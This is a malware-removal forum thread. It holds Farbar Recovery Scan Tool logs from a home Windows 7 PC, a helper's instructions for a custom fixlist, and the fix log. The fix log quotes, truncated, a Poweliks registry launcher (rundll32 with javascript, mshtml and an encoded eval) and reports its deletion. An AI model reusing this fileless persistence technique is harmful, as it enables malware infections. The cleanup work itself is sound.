2014-11-07 15:53 - 2014-11-07 15:53 - 01160704 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\_ssl.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00320512 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32com.shell.shell.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00713216 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\_hashlib.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 01175040 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._core_.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00805888 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._gdi_.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00811008 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._windows_.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 01062400 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._controls_.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00735232 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._misc_.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00128512 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\_elementtree.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00127488 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\pyexpat.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00557056 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\pysqlite2._sqlite.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00087552 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\_ctypes.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00119808 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32file.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00108544 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32security.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00007168 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\hashobjs_ext.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00167936 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32gui.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00018432 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32event.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00038912 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32inet.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00011264 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32crypt.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00070656 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._html2.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00027136 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\_multiprocessing.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00035840 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32process.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00686080 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\unicodedata.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00122368 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._wizard.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00024064 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32pipe.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00025600 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32pdh.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00525640 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\windows._lib_cacheinvalidation.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00010240 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\select.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00017408 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32profile.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00022528 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\win32ts.pyd
2014-11-07 15:53 - 2014-11-07 15:53 - 00078336 _____ () C:\Users\MoM\AppData\Local\Temp\_MEI30402\wx._animate.pyd
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-4081318669-4177893195-338242575-500 - Administrator - Disabled)
Guest (S-1-5-21-4081318669-4177893195-338242575-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4081318669-4177893195-338242575-1002 - Administrator - Enabled)
MoM (S-1-5-21-4081318669-4177893195-338242575-1000 - Administrator - Enabled) => C:\Users\MoM
==================== Faulty Device Manager Devices =============
Name: F:\
Description: Multi-Card
Class Guid: {eec5ad98-8080-425f-922a-dabf3de3f69a}
Manufacturer: Generic-
Service: WUDFRd
Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19)
Resolution: A registry problem was detected.
This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options:
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver.
==================== Event log errors: =========================
Application errors:
==================
Error: (11/06/2014 08:34:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program StrifeWindows-0.4.0.7 (1).exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 1258
Start Time: 01cffa2ac8c59d44
Termination Time: 20
Application Path: C:\Users\MoM\Downloads\StrifeWindows-0.4.0.7 (1).exe
Report Id:
Error: (11/06/2014 05:38:37 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Explorer.EXE version 6.1.7601.17567 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: e1c
Start Time: 01cffa11ba59afa7
Termination Time: 40
Application Path: C:\Windows\Explorer.EXE
Report Id: 9d95c869-6605-11e4-9799-4c72b92efff8
Error: (11/04/2014 05:41:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x0009521f
Faulting process id: 0x2558
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (11/04/2014 05:23:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: Flash32_15_0_0_167.ocx, version: 15.0.0.167, time stamp: 0x541384c0
Exception code: 0xc0000005
Fault offset: 0x00647997
Faulting process id: 0x1650
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (11/03/2014 07:20:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MotoHelperAgent.exe, version: 2.0.44.0, time stamp: 0x4d41dffe
Faulting module name: MotoHelperAgent.exe, version: 2.0.44.0, time stamp: 0x4d41dffe
Exception code: 0x40000015
Fault offset: 0x00030a00
Faulting process id: 0x914
Faulting application start time: 0xMotoHelperAgent.exe0
Faulting application path: MotoHelperAgent.exe1
Faulting module path: MotoHelperAgent.exe2
Report Id: MotoHelperAgent.exe3
Error: (11/03/2014 06:03:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x2d80
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (10/31/2014 08:15:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x3704
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Error: (10/31/2014 08:13:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002101e2
Faulting process id: 0x3504
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3
Error: (10/31/2014 08:08:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002201e2
Faulting process id: 0x29a8
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3
Error: (10/31/2014 08:03:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x001e01e2
Faulting process id: 0x3100
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3
System errors:
=============
Error: (11/07/2014 03:55:57 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (11/07/2014 03:54:21 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
Error: (11/07/2014 03:54:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
Error: (11/07/2014 07:05:11 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
Error: (11/07/2014 07:05:02 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Andrea ST Filters Service service terminated unexpectedly. It has done this 1 time(s).
Error: (11/07/2014 06:57:39 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
Error: (11/07/2014 06:57:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
Error: (11/06/2014 11:26:00 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (11/06/2014 11:24:43 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
Error: (11/06/2014 11:24:42 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)
Microsoft Office Sessions:
=========================
Error: (11/06/2014 08:34:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: StrifeWindows-0.4.0.7 (1).exe0.0.0.0125801cffa2ac8c59d4420C:\Users\MoM\Downloads\StrifeWindows-0.4.0.7 (1).exe
Error: (11/06/2014 05:38:37 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Explorer.EXE6.1.7601.17567e1c01cffa11ba59afa740C:\Windows\Explorer.EXE9d95c869-6605-11e4-9799-4c72b92efff8
Error: (11/04/2014 05:41:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd0009521f255801cff8803913e558C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllb68f3b09-6473-11e4-aa42-4c72b92efff8
Error: (11/04/2014 05:23:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7Flash32_15_0_0_167.ocx15.0.0.167541384c0c000000500647997165001cff87d89a79a02C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Macromed\Flash\Flash32_15_0_0_167.ocx3ec594e4-6471-11e4-aa42-4c72b92efff8
Error: (11/03/2014 07:20:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: MotoHelperAgent.exe2.0.44.04d41dffeMotoHelperAgent.exe2.0.44.04d41dffe4000001500030a0091401cff7c4d479c6efC:\Program Files (x86)\Motorola\MotoHelper\MotoHelperAgent.exeC:\Program Files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe5ad5b1c0-63b8-11e4-95b5-4c72b92efff8
Error: (11/03/2014 06:03:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000947652d8001cff7b9f6070f41C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlla29fd708-63ad-11e4-9275-4c72b92efff8
Error: (10/31/2014 08:15:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094765370401cff571129b692bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll83d95638-6164-11e4-96df-4c72b92efff8
Error: (10/31/2014 08:13:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002101e2350401cff571007c462fC:\Windows\syswow64\dllhost.exeunknown3f8d52d0-6164-11e4-96df-4c72b92efff8
Error: (10/31/2014 08:08:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002201e229a801cff5704a201644C:\Windows\syswow64\dllhost.exeunknown8916e422-6163-11e4-96df-4c72b92efff8
Error: (10/31/2014 08:03:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005001e01e2310001cff56f93b4a470C:\Windows\syswow64\dllhost.exeunknownd2acf8ee-6162-11e4-96df-4c72b92efff8
==================== Memory info ===========================
Processor: AMD A4-3400 APU with Radeon™ HD Graphics
Percentage of memory in use: 61%
Total physical RAM: 3570.81 MB
Available physical RAM: 1362.29 MB
Total Pagefile: 7139.8 MB
Available Pagefile: 4495.17 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:916.64 GB) (Free:844.41 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:14.77 GB) (Free:1.83 GB) NTFS ==>[System with boot components (obtained from reading drive)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 927D4849)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=916.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=14.8 GB) - (Type=07 NTFS)
==================== End Of Log ============================
#4
Conspire
-
- Retired Classroom Teacher
-
- 5,806 posts
SuperHelper
Posted 07 November 2014 - 09:21 PM
Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
fixlist.txt 370bytes
167 downloads
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it and fresh FRST log to your reply.
===================================================
On your next reply please post :
FRST Fix Log
Fresh FRST log
Please STOP and let me know if you have any problems in performing with the steps above or any questions you may have.
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
fixlist.txt 370bytes
167 downloadsNOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it and fresh FRST log to your reply.
===================================================
On your next reply please post :
FRST Fix Log
Fresh FRST log
Please STOP and let me know if you have any problems in performing with the steps above or any questions you may have.
Proud Graduate of the WTT Classroom
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
#5
Conor Detwiller
-
- Authentic Member
-
- 6 posts
New Member
Posted 07 November 2014 - 11:48 PM
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 08-11-2014
Ran by MoM at 2014-11-08 00:33:24 Run:1
Running from C:\Users\MoM\Desktop
Loaded Profile: MoM (Available profiles: MoM)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Toolbar: HKCU - No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
EmptyTemp:
end
*****************
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-4081318669-4177893195-338242575-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-4081318669-4177893195-338242575-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} => value deleted successfully.
"HKCR\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}" => Key not found.
EmptyTemp: => Removed 987.5 MB temporary data.
The system needed a reboot.
==== End of Fixlog ====
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 08-11-2014
Ran by MoM (administrator) on MOM-HP on 08-11-2014 00:45:26
Running from C:\Users\MoM\Desktop
Loaded Profile: MoM (Available profiles: MoM)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Portrait Displays, Inc.) C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
() C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Portrait Displays, Inc.) C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdisrvc.exe
(Roxio) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Hewlett-Packard ) C:\Program Files\IDT\WDM\beats64.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Curse, Inc) C:\Users\MoM\AppData\Roaming\Curse Client\Bin\Curse.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\schtasks.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPNetworkCommunicatorCom.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPNetworkCommunicator.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\Media\Webcam\YCMMirage.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [BeatsOSDApp] => C:\Program Files\IDT\WDM\beats64.exe [37888 2010-10-21] (Hewlett-Packard )
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1128448 2011-06-24] (IDT, Inc.)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [336384 2011-06-30] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [DT HPO] => C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DT_startup.exe [121648 2011-08-19] (Portrait Displays, Inc.)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [658424 2011-05-05] (PDF Complete Inc)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-10-11] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\qttask.exe [421888 2012-11-19] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [SMessaging] => "C:\Users\MoM\AppData\Local\Strongvault Online Backup\SMessaging.exe"
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKLM\...\Policies\Explorer: [AllowLegacyWebView] 1
HKLM\...\Policies\Explorer: [AllowUnhashedWebView] 1
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [HP Deskjet 3510 series (NET)] => C:\Program Files\hp\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe [2552168 2012-05-08] (Hewlett-Packard Co.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [BackupAgent] => C:\Program Files (x86)\Strongvault Online Backup\BackupAgent.exe
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [Facebook Update] => C:\Users\MoM\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-05-10] (Facebook Inc.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-09-23] (Google Inc.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\Overwolf.exe -silent
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22066272 2014-10-01] (Skype Technologies S.A.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\MountPoints2: {47658f94-5cda-11e2-b468-4c72b92efff8} - G:\MotorolaDeviceManagerSetup.exe -a
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\MountPoints2: {7f12c475-058d-11e2-b461-4c72b92efff8} - G:\setup.exe -a
Startup: C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk
ShortcutTarget: Curse.lnk -> C:\Users\MoM\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
Startup: C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - .lnk
ShortcutTarget: Monitor Ink Alerts - .lnk -> C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
Startup: C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Deskjet 3510 series (Network).lnk
ShortcutTarget: Monitor Ink Alerts - HP Deskjet 3510 series (Network).lnk -> C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
